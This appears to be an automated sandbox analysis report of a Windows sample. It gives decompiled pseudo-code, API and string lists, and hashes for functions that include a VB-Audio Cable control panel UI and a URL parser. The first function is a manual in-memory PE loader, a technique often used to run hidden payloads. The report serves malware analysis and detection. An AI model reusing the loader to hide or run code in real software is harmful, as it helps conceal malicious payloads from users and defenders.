													 *((intOrPtr*)(_v76 + 0x3c)) = _v68;
													_t194 = E1001AE40(_a8,  *((intOrPtr*)(_v84 + 0x54)));
													_t334 = _t333 + 8;
													if(_t194 != 0) {
														_v8 = _a12(_v24,  *((intOrPtr*)(_v84 + 0x54)), 0x1000, 4, _a32);
														E1000D190(_t239, _t326, _t327, _v8, _v16,  *((intOrPtr*)(_v84 + 0x54)));
														_t121 =  &(_v16[0x1e]); // 0xc707ebe8
														 *_v76 = _v8 +  *_t121;
														 *((intOrPtr*)( *_v76 + 0x34)) = _v24;
														_t203 = E1001B300(_t239, _t326, _t327, _a4, _a8, _v84, _v76);
														_t337 = _t334 + 0x30;
														if(_t203 != 0) {
															_t311 =  *((intOrPtr*)( *_v76 + 0x34)) -  *((intOrPtr*)(_v84 + 0x34));
															_v80 = _t311;
															if(_t311 == 0) {
																 *((intOrPtr*)(_v76 + 0x18)) = 1;
															} else {
																_t220 = E1001B0C0(_v76, _v80);
																_t337 = _t337 + 8;
																 *((intOrPtr*)(_v76 + 0x18)) = _t220;
															}
															_t206 = E1001AB60(_v76);
															_t338 = _t337 + 4;
															if(_t206 != 0) {
																_t207 = E1001B490(_v76);
																_t339 = _t338 + 4;
																if(_t207 != 0) {
																	_t209 = E1001AD80(_v76);
																	_t339 = _t339 + 4;
																	if(_t209 != 0) {
																		if( *((intOrPtr*)( *_v76 + 0x28)) == 0) {
																			 *((intOrPtr*)(_v76 + 0x38)) = 0;
																			L49:
																			return _v76;
																		}
																		if( *(_v76 + 0x14) == 0) {
																			 *((intOrPtr*)(_v76 + 0x38)) = _v24 +  *((intOrPtr*)( *_v76 + 0x28));
																			L47:
																			goto L49;
																		}
																		_v100 = _v24 +  *((intOrPtr*)( *_v76 + 0x28));
																		_v96 = _v100(_v24, 1, 0);
																		if(_v96 != 0) {
																			 *((intOrPtr*)(_v76 + 0x10)) = 1;
																			goto L47;
																		}
																		SetLastError(0x45a);
																		L50:
																		E1001A960(_v76);
																		return 0;
																	}
																	goto L50;
																}
																goto L50;
															}
															goto L50;
														}
														goto L50;
													}
													goto L50;
												}
												_a16(_v24, 0, 0x8000, _a32);
												SetLastError(0xe);
												return 0;
											}
											_t225 = _a12(0, _v32, 0x3000, 4, _a32);
											_t333 = _t333 + 0x14;
											_v24 = _t225;
											if(_v24 != 0) {
												goto L26;
											}
											SetLastError(0xe);
											return 0;
										}
										SetLastError(0xc1);
										return 0;
									}
									SetLastError(0xc1);
									return 0;
								}
								SetLastError(0xc1);
								return 0;
							}
							SetLastError(0xc1);
							return 0;
						}
						return 0;
					}
					SetLastError(0xc1);
					return 0;
				}
				return 0;
			}












































                                                                                                                                                      0x1001b620
                                                                                                                                                      0x1001b620
                                                                                                                                                      0x1001b620
                                                                                                                                                      0x1001b626
                                                                                                                                                      0x1001b62d
                                                                                                                                                      0x1001b64b
                                                                                                                                                      0x1001b654
                                                                                                                                                      0x1001b659
                                                                                                                                                      0x1001b65e
                                                                                                                                                      0x1001b66a
                                                                                                                                                      0x1001b678
                                                                                                                                                      0x1001b68f
                                                                                                                                                      0x1001b69d
                                                                                                                                                      0x1001b6a2
                                                                                                                                                      0x1001b6a7
                                                                                                                                                      0x1001b6b6
                                                                                                                                                      0x1001b6b9
                                                                                                                                                      0x1001b6c5
                                                                                                                                                      0x1001b6e6
                                                                                                                                                      0x1001b703
                                                                                                                                                      0x1001b725
                                                                                                                                                      0x1001b72e
                                                                                                                                                      0x1001b731
                                                                                                                                                      0x1001b74c
                                                                                                                                                      0x1001b75f
                                                                                                                                                      0x1001b77b
                                                                                                                                                      0x1001b761
                                                                                                                                                      0x1001b76a
                                                                                                                                                      0x1001b76a
                                                                                                                                                      0x1001b784
                                                                                                                                                      0x1001b789
                                                                                                                                                      0x1001b789
                                                                                                                                                      0x1001b740
                                                                                                                                                      0x1001b749
                                                                                                                                                      0x1001b749
                                                                                                                                                      0x1001b792
                                                                                                                                                      0x1001b7a8
                                                                                                                                                      0x1001b7b3
                                                                                                                                                      0x1001b7b8
                                                                                                                                                      0x1001b7be
                                                                                                                                                      0x1001b7e8
                                                                                                                                                      0x1001b7eb
                                                                                                                                                      0x1001b7ee
                                                                                                                                                      0x1001b7f5
                                                                                                                                                      0x1001b826
                                                                                                                                                      0x1001b837
                                                                                                                                                      0x1001b83e
                                                                                                                                                      0x1001b86a
                                                                                                                                                      0x1001b87c
                                                                                                                                                      0x1001b883
                                                                                                                                                      0x1001b88c
                                                                                                                                                      0x1001b895
                                                                                                                                                      0x1001b89e
                                                                                                                                                      0x1001b8a7
                                                                                                                                                      0x1001b8b0
                                                                                                                                                      0x1001b8b9
                                                                                                                                                      0x1001b8c2
                                                                                                                                                      0x1001b8d0
                                                                                                                                                      0x1001b8d5
                                                                                                                                                      0x1001b8da
                                                                                                                                                      0x1001b8fd
                                                                                                                                                      0x1001b90f
                                                                                                                                                      0x1001b91d
                                                                                                                                                      0x1001b923
                                                                                                                                                      0x1001b92d
                                                                                                                                                      0x1001b940
                                                                                                                                                      0x1001b945
                                                                                                                                                      0x1001b94a
                                                                                                                                                      0x1001b95c
                                                                                                                                                      0x1001b95f
                                                                                                                                                      0x1001b962
                                                                                                                                                      0x1001b97f
                                                                                                                                                      0x1001b964
                                                                                                                                                      0x1001b96c
                                                                                                                                                      0x1001b971
                                                                                                                                                      0x1001b977
                                                                                                                                                      0x1001b977
                                                                                                                                                      0x1001b98a
                                                                                                                                                      0x1001b98f
                                                                                                                                                      0x1001b994
                                                                                                                                                      0x1001b99f
                                                                                                                                                      0x1001b9a4
                                                                                                                                                      0x1001b9a9
                                                                                                                                                      0x1001b9b4
                                                                                                                                                      0x1001b9b9
                                                                                                                                                      0x1001b9be
                                                                                                                                                      0x1001b9cb
                                                                                                                                                      0x1001ba27
                                                                                                                                                      0x1001ba2e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001ba2e
                                                                                                                                                      0x1001b9d4
                                                                                                                                                      0x1001ba1f
                                                                                                                                                      0x1001ba22
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001ba22
                                                                                                                                                      0x1001b9e1
                                                                                                                                                      0x1001b9ef
                                                                                                                                                      0x1001b9f6
                                                                                                                                                      0x1001ba08
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001ba08
                                                                                                                                                      0x1001b9fd
                                                                                                                                                      0x1001ba33
                                                                                                                                                      0x1001ba37
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001ba3f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001b9c0
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001b9ab
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001b996
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001b94c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001b8dc
                                                                                                                                                      0x1001b84f
                                                                                                                                                      0x1001b857
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001b85d
                                                                                                                                                      0x1001b808
                                                                                                                                                      0x1001b80b
                                                                                                                                                      0x1001b80e
                                                                                                                                                      0x1001b815
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001b819
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001b81f
                                                                                                                                                      0x1001b7c5
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001b7cb
                                                                                                                                                      0x1001b70a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001b710
                                                                                                                                                      0x1001b6ed
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001b6f3
                                                                                                                                                      0x1001b6cc
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001b6d2
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001b6a9
                                                                                                                                                      0x1001b67f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001b685
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 1001B63E
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 1001B645
                                                                                                                                                        • Part of subcall function 1001AE40: SetLastError.KERNEL32(0000000D,?,1001B659,100207E4,00000040), ref: 1001AE4D
                                                                                                                                                      • SetLastError.KERNEL32(000000C1), ref: 1001B67F
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorLast$AddressHandleModuleProc
                                                                                                                                                      • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                                      • API String ID: 1762409328-192647395
                                                                                                                                                      • Opcode ID: b2bd2be9dcdaaa9e1dd356673cdb130947970779371eee44ad3347cb4051ef6d
                                                                                                                                                      • Instruction ID: 948ec142860bc01625bc2ce9e1704a97d6b06a0078abf06e4df2749841334317
                                                                                                                                                      • Opcode Fuzzy Hash: b2bd2be9dcdaaa9e1dd356673cdb130947970779371eee44ad3347cb4051ef6d
                                                                                                                                                      • Instruction Fuzzy Hash: CAE1E5B4E00609DFDB04CF94C885AAEBBB5FF88304F648558E905AF395D774E982CB91
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00403440, Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 80synchronizationCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 95%
                                                                                                                                                      			E00403440(void* __ebx, void* __edx, intOrPtr _a4) {
				char _v128;
				struct tagMSG _v156;
				signed int _t9;
				int _t16;
				int _t23;
				signed int _t25;
				void* _t32;
				void* _t42;

				_t32 = __edx;
				_t9 = CreateMutexA(0, 1, "VB-Audio Cable -Control Panel- Mutex-{12783DE4-C2B5-4698-9D26-EA7E355B50E9}");
				_t42 = _t9;
				if(_t42 != 0) {
					__eflags = GetLastError() - 0xb7;
					if(__eflags != 0) {
						WaitForSingleObject(_t42, 0xffffffff);
						E00403540(__eflags, 0x4106a8, _a4);
						E004036D0(__ebx, _t32,  &_v128, "VB-Audio Virtual Cable Control Panel (Version %s)", "1.0.3.5");
						E00403340(_a4, 0x402e40, "MyMainAppMenu",  &_v128);
						_t16 = GetMessageA( &_v156, 0, 0, 0);
						__eflags = _t16;
						if(_t16 != 0) {
							_push(__ebx);
							do {
								TranslateMessage( &_v156);
								DispatchMessageA( &_v156);
								_t23 = GetMessageA( &_v156, 0, 0, 0);
								__eflags = _t23;
							} while (_t23 != 0);
						}
						ReleaseMutex(_t42);
						CloseHandle(_t42);
						return _v156.wParam;
					} else {
						_t25 = ReleaseMutex(_t42) | 0xffffffff;
						__eflags = _t25;
						return _t25;
					}
				} else {
					return _t9 | 0xffffffff;
				}
			}











                                                                                                                                                      0x00403440
                                                                                                                                                      0x00403450
                                                                                                                                                      0x00403456
                                                                                                                                                      0x0040345a
                                                                                                                                                      0x0040346f
                                                                                                                                                      0x00403474
                                                                                                                                                      0x0040348e
                                                                                                                                                      0x004034a1
                                                                                                                                                      0x004034b5
                                                                                                                                                      0x004034ca
                                                                                                                                                      0x004034e3
                                                                                                                                                      0x004034e5
                                                                                                                                                      0x004034e7
                                                                                                                                                      0x004034e9
                                                                                                                                                      0x004034f7
                                                                                                                                                      0x004034fc
                                                                                                                                                      0x00403503
                                                                                                                                                      0x00403510
                                                                                                                                                      0x00403512
                                                                                                                                                      0x00403512
                                                                                                                                                      0x00403517
                                                                                                                                                      0x00403519
                                                                                                                                                      0x00403520
                                                                                                                                                      0x00403532
                                                                                                                                                      0x00403476
                                                                                                                                                      0x0040347d
                                                                                                                                                      0x0040347d
                                                                                                                                                      0x00403487
                                                                                                                                                      0x00403487
                                                                                                                                                      0x0040345c
                                                                                                                                                      0x00403466
                                                                                                                                                      0x00403466

                                                                                                                                                      APIs
                                                                                                                                                      • CreateMutexA.KERNEL32(00000000,00000001,VB-Audio Cable -Control Panel- Mutex-{12783DE4-C2B5-4698-9D26-EA7E355B50E9}), ref: 00403450
                                                                                                                                                      • GetLastError.KERNEL32 ref: 00403469
                                                                                                                                                      • ReleaseMutex.KERNEL32(00000000), ref: 00403477
                                                                                                                                                      Strings
                                                                                                                                                      • MyMainAppMenu, xrefs: 004034BF
                                                                                                                                                      • VB-Audio Virtual Cable Control Panel (Version %s), xrefs: 004034AF
                                                                                                                                                      • VB-Audio Cable -Control Panel- Mutex-{12783DE4-C2B5-4698-9D26-EA7E355B50E9}, xrefs: 00403447
                                                                                                                                                      • 1.0.3.5, xrefs: 004034A6
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Mutex$CreateErrorLastRelease
                                                                                                                                                      • String ID: 1.0.3.5$MyMainAppMenu$VB-Audio Cable -Control Panel- Mutex-{12783DE4-C2B5-4698-9D26-EA7E355B50E9}$VB-Audio Virtual Cable Control Panel (Version %s)
                                                                                                                                                      • API String ID: 1553430826-612237310
                                                                                                                                                      • Opcode ID: 0c2093be51ec6a3dd59bf06eb4acf0b6edaa44eeb9dd057be054cd7b85814052
                                                                                                                                                      • Instruction ID: d4fbd8c6f311102f4b008c834d8ea839e75bef2df17ef2523c369acf2d79b8a2
                                                                                                                                                      • Opcode Fuzzy Hash: 0c2093be51ec6a3dd59bf06eb4acf0b6edaa44eeb9dd057be054cd7b85814052
                                                                                                                                                      • Instruction Fuzzy Hash: 81210731540308BBE220AB74DC45F6B3B5CEB44755F100936BA29B61D1DBB8A50886AE
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00403340, Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 70windowregistryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00403340(struct HINSTANCE__* _a4, intOrPtr _a8, intOrPtr _a12, CHAR* _a16) {
				struct _WNDCLASSA _v40;
				struct HWND__* _t21;
				struct HINSTANCE__* _t31;
				struct HWND__* _t32;

				_t31 = _a4;
				_v40.style = 3;
				_v40.lpfnWndProc = _a8;
				_v40.cbClsExtra = 0;
				_v40.cbWndExtra = 0;
				_v40.hInstance = _t31;
				_v40.hIcon = LoadIconA(_t31, 0x64);
				_v40.hCursor = LoadCursorA(0, 0x7f00);
				_v40.hbrBackground = 0xc;
				_v40.lpszMenuName = _a12;
				_v40.lpszClassName = "VBCABLE0ControlPanel0MainWindow0";
				if(RegisterClassA( &_v40) != 0) {
					_t21 = CreateWindowExA(0, "VBCABLE0ControlPanel0MainWindow0", _a16, 0x2cb0000, 0x80000000, 0x80000000, 0x384, 0x12c, 0, 0, _t31, 0);
					_t32 = _t21;
					if(_t32 != 0) {
						ShowWindow(_t32, 5);
						UpdateWindow(_t32);
						return _t32;
					} else {
						MessageBoxA(_t21, "Failed to create window...", "Startup Error", 0x30);
						return 0;
					}
				} else {
					MessageBoxA(0, "Failed to register window class...", "Startup Error", 0x30);
					return 0;
				}
			}







                                                                                                                                                      0x00403348
                                                                                                                                                      0x0040334f
                                                                                                                                                      0x00403357
                                                                                                                                                      0x0040335b
                                                                                                                                                      0x00403363
                                                                                                                                                      0x0040336b
                                                                                                                                                      0x0040337c
                                                                                                                                                      0x0040338f
                                                                                                                                                      0x00403393
                                                                                                                                                      0x0040339b
                                                                                                                                                      0x0040339f
                                                                                                                                                      0x004033b0
                                                                                                                                                      0x004033f9
                                                                                                                                                      0x004033ff
                                                                                                                                                      0x00403403
                                                                                                                                                      0x00403422
                                                                                                                                                      0x00403429
                                                                                                                                                      0x00403435
                                                                                                                                                      0x00403405
                                                                                                                                                      0x00403412
                                                                                                                                                      0x0040341e
                                                                                                                                                      0x0040341e
                                                                                                                                                      0x004033b2
                                                                                                                                                      0x004033c0
                                                                                                                                                      0x004033cc
                                                                                                                                                      0x004033cc

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: LoadMessage$ClassCreateCursorIconRegisterWindow
                                                                                                                                                      • String ID: Failed to create window...$Failed to register window class...$Startup Error$VBCABLE0ControlPanel0MainWindow0
                                                                                                                                                      • API String ID: 2259001068-3365842253
                                                                                                                                                      • Opcode ID: 0c2879e572fcc9e7f8191eb746f43d3c5421fde4c5571bdbc84616ab7fb244cc
                                                                                                                                                      • Instruction ID: 6739fdb3db1c511da3919410641a009b659cdbc5ad3c0998b96c8b0e4b081f06
                                                                                                                                                      • Opcode Fuzzy Hash: 0c2879e572fcc9e7f8191eb746f43d3c5421fde4c5571bdbc84616ab7fb244cc
                                                                                                                                                      • Instruction Fuzzy Hash: C321A130685310BBE3109F649C59F4B7BE4FF88B45F504529FA84BA2D0D3B896048BCE
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00402CC0, Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 86windowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 30%
                                                                                                                                                      			E00402CC0(struct HWND__* _a4, signed int _a8) {
				void* _t9;
				signed int _t20;

				_t20 = _a8 & 0x0000ffff;
				_t9 = _t20 - 0x5a;
				if(_t9 > 0x21) {
					L4:
					if(_t20 < 0x68 || _t20 > 0x6c) {
						__eflags = _t20 - 0x64;
						if(_t20 >= 0x64) {
							__eflags = _t20 - 0x67;
							if(_t20 <= 0x67) {
								_t22 = _t20 + 0xffffff9d << 9;
								__eflags = _t20 + 0xffffff9d << 9;
								E00402C60(_t20 + 0xffffff9d << 9, _t22);
								goto L18;
							}
						}
						return _t9;
					} else {
						E00402C60(_t20 + 0xffffff9b << 0xa, _t20 + 0xffffff9b << 0xa);
						goto L7;
					}
				} else {
					switch( *((intOrPtr*)(0 +  &M00402DEC))) {
						case 0:
							_push(5);
							_push(0);
							_push(0);
							_push("http://www.vb-cable.com");
							_push("open");
							_push( *0x4106a8);
							goto L3;
						case 1:
							__eax =  *0x4106a8;
							_push(5);
							_push(0);
							_push(0);
							_push("http://www.facebook.com/pages/VB-Audio-Software/396002733802606");
							_push("open");
							_push( *0x4106a8);
							goto L3;
						case 2:
							_push(5);
							_push(0);
							_push(0);
							_push("http://www.vb-audio.com");
							_push("open");
							_push( *0x4106a8);
							L3:
							_t9 = ShellExecuteA();
							goto L4;
						case 3:
							_push(0xac44);
							goto L14;
						case 4:
							__eax = E00402C00(__eflags, 0xbb80);
							L7:
							return MessageBoxA(_a4, "The change will take effect on next launch...\n\nPlease reboot your computer.\n", "VBCABLE Settings", 0x1030);
							goto L20;
						case 5:
							__eax = E00402C00(__eflags, 0x15888);
							L18:
							return MessageBoxA(_a4, "The change will take effect on next launch...\n\nPlease reboot your computer.\n", "VBCABLE Settings", 0x1030);
						case 6:
							_push(0x17700);
							L14:
							__eax = E00402C00(__eflags);
							__esp = __esp + 4;
							return MessageBoxA(_a4, "The change will take effect on next launch...\n\nPlease reboot your computer.\n", "VBCABLE Settings", 0x1030);
							goto L20;
						case 7:
							goto L4;
					}
				}
				L20:
			}





                                                                                                                                                      0x00402cc5
                                                                                                                                                      0x00402ccb
                                                                                                                                                      0x00402cd1
                                                                                                                                                      0x00402cff
                                                                                                                                                      0x00402d02
                                                                                                                                                      0x00402db5
                                                                                                                                                      0x00402db8
                                                                                                                                                      0x00402dba
                                                                                                                                                      0x00402dbd
                                                                                                                                                      0x00402dc2
                                                                                                                                                      0x00402dc2
                                                                                                                                                      0x00402dc6
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00402dc6
                                                                                                                                                      0x00402dbd
                                                                                                                                                      0x00402de9
                                                                                                                                                      0x00402d11
                                                                                                                                                      0x00402d18
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00402d18
                                                                                                                                                      0x00402cd3
                                                                                                                                                      0x00402cdb
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00402ce8
                                                                                                                                                      0x00402cea
                                                                                                                                                      0x00402cec
                                                                                                                                                      0x00402cee
                                                                                                                                                      0x00402cf3
                                                                                                                                                      0x00402cf8
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00402d3c
                                                                                                                                                      0x00402d41
                                                                                                                                                      0x00402d43
                                                                                                                                                      0x00402d45
                                                                                                                                                      0x00402d47
                                                                                                                                                      0x00402d4c
                                                                                                                                                      0x00402d51
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00402d5a
                                                                                                                                                      0x00402d5c
                                                                                                                                                      0x00402d5e
                                                                                                                                                      0x00402d60
                                                                                                                                                      0x00402d65
                                                                                                                                                      0x00402d6a
                                                                                                                                                      0x00402cf9
                                                                                                                                                      0x00402cf9
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00402d6d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00402d79
                                                                                                                                                      0x00402d1d
                                                                                                                                                      0x00402d3b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00402d85
                                                                                                                                                      0x00402dcb
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00402d8c
                                                                                                                                                      0x00402d91
                                                                                                                                                      0x00402d91
                                                                                                                                                      0x00402d9a
                                                                                                                                                      0x00402db4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00402cdb
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      • ShellExecuteA.SHELL32(00000000,open,http://www.vb-cable.com,00000000,00000000,00000005), ref: 00402CF9
                                                                                                                                                      • MessageBoxA.USER32 ref: 00402D34
                                                                                                                                                      • MessageBoxA.USER32 ref: 00402DAD
                                                                                                                                                      • MessageBoxA.USER32 ref: 00402DE2
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Message$ExecuteShell
                                                                                                                                                      • String ID: The change will take effect on next launch...Please reboot your computer.$VBCABLE Settings$http://www.facebook.com/pages/VB-Audio-Software/396002733802606$http://www.vb-audio.com$http://www.vb-cable.com$open
                                                                                                                                                      • API String ID: 2697723495-305876929
                                                                                                                                                      • Opcode ID: 6ca41875a5a5dd64532a189b281f19e1b11d6fbe90ebf9ebfd05a0aeb9f09956
                                                                                                                                                      • Instruction ID: a4b70d8e39191fc549faaf501da86aeb9c8e6f077dca2208f8895d5d0ed58bf7
                                                                                                                                                      • Opcode Fuzzy Hash: 6ca41875a5a5dd64532a189b281f19e1b11d6fbe90ebf9ebfd05a0aeb9f09956
                                                                                                                                                      • Instruction Fuzzy Hash: 90212531B88310BAE5203794AE8FF9E2354AF44B14F21813BFA557A1C2D2FC6C44558E
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 100211B0, Relevance: 16.7, APIs: 11, Instructions: 232COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E100211B0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr* _a24) {
				char _v8;
				char _v12;
				char* _v16;
				char* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v35;
				char _v39;
				char _v43;
				char _v44;
				void* _t86;
				void* _t88;
				intOrPtr _t91;
				void* _t92;
				void* _t120;
				void* _t140;
				void* _t141;
				void* _t191;
				void* _t192;
				void* _t193;
				void* _t194;
				void* _t195;
				void* _t196;

				_t192 = __esi;
				_t191 = __edi;
				_t141 = __ebx;
				_v32 = 0;
				_v20 = "https://";
				_v16 = "http://";
				_v12 = 0;
				_v8 = 0;
				_v28 = 0;
				_v24 = 0;
				_v44 = 0;
				_v43 = 0;
				_v39 = 0;
				_v35 = 0;
				_t86 = E10001A50(_a4, _v20);
				_t194 = _t193 + 8;
				if(_t86 != 0) {
					L2:
					_v8 = _a4;
					_t88 = E10001A50(_a4, _v20);
					_t195 = _t194 + 8;
					if(_t88 == 0) {
						 *_a8 = 0;
						_v8 = _v8 + 7;
						 *_a20 = 0x50;
					} else {
						 *_a8 = 1;
						_v8 = _v8 + 8;
						 *_a20 = 0x1bb;
					}
					_t91 = E10001A50(_v8, "/");
					_t196 = _t195 + 8;
					_v28 = _t91;
					if(_v28 == 0) {
						_t92 = E1000CAC0(_v8);
						_t196 = _t196 + 4;
						_v24 = _t92 + 1;
					} else {
						_v24 = _v28 - _v8 + 1;
					}
					 *_a12 = L1000CE56(_t141, _v24, _t191, _t192, _v24);
					E1000CF20(_t191,  *_a12, 0, _v24);
					E1000D190(_t141, _t191, _t192,  *_a12, _v8, _v24 - 1);
					_v28 = E10001A50(_v8, "/");
					if(_v28 == 0) {
						_v24 = 2;
						 *_a24 = L1000CE56(_t141, _v24, _t191, _t192, _v24);
						E1000CF20(_t191,  *_a24, 0, _v24);
						E1000E280( *_a24, "/");
					} else {
						_v24 = E1000CAC0(_v8) - _v28 - _v8 + 1;
						 *_a24 = L1000CE56(_t141, _v28 - _v8, _t191, _t192, _v24);
						E1000CF20(_t191,  *_a24, 0, _v24);
						E1000E280( *_a24, _v28);
					}
					_v8 = E10001A50( *_a12, ":");
					if(_v8 == 0) {
						_t181 = _a12;
						_v24 = E1000CAC0( *_a12) + 1;
					} else {
						_v24 = _v8 -  *_a12 + 1;
						_t120 = E1000CAC0( *_a12);
						_t181 =  &_v44;
						E1000D190(_t141, _t191, _t192,  &_v44, _v8 + 1, _t120 - _v24);
						E1000E5E5( &_v44, "%d", _a20);
					}
					 *_a16 = L1000CE56(_t141, _t181, _t191, _t192, _v24);
					E1000CF20(_t191,  *_a16, 0, _v24);
					E1000D190(_t141, _t191, _t192,  *_a16,  *_a12, _v24 - 1);
					_v32 = 1;
				} else {
					_t140 = E10001A50(_a4, _v16);
					_t194 = _t194 + 8;
					if(_t140 != 0) {
						goto L2;
					}
				}
				return _v32;
			}



























                                                                                                                                                      0x100211b0
                                                                                                                                                      0x100211b0
                                                                                                                                                      0x100211b0
                                                                                                                                                      0x100211b6
                                                                                                                                                      0x100211bd
                                                                                                                                                      0x100211c4
                                                                                                                                                      0x100211cb
                                                                                                                                                      0x100211d2
                                                                                                                                                      0x100211d9
                                                                                                                                                      0x100211e0
                                                                                                                                                      0x100211e7
                                                                                                                                                      0x100211ed
                                                                                                                                                      0x100211f0
                                                                                                                                                      0x100211f3
                                                                                                                                                      0x100211fe
                                                                                                                                                      0x10021203
